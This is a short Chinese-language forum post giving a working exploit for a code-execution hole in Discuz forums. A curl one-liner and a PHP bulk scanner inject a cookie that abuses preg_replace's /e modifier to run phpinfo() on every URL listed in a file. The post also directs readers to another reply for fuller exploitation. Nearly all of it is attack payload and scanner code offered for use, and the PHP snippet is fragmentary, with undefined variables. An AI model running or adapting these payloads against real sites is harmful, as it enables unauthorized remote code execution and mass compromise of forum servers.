用法 先 用抓取url工具 抓取 若干 url (url为 带表情的帖子,或回复)
存放至 dz.txt 文件 然后执行本脚本
漏洞利用请关注 第82楼
单个测试语句(windows):
1
| curl 'http://bbs.test.com/viewthread.php?tid=29958' -s --cookie 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();' |findstr /i /c:'<h2>PHP License</h2>'
|
有返回说明有洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <?php
$rc->__set('time_out', $timeout);
$urls=file('dz.txt');
foreach ($urls as $url) {
$request = new RollingCurlRequest(trim($url));
$request->options = array(CURLOPT_HTTPHEADER => array('Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'));
$rc->add($request);
}
$rc->execute();
function func_time()
{
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $sec;
}
echo '\r\n'.'time: ' . round((func_time() – $start_time), 4) . 'sec ';
?>
|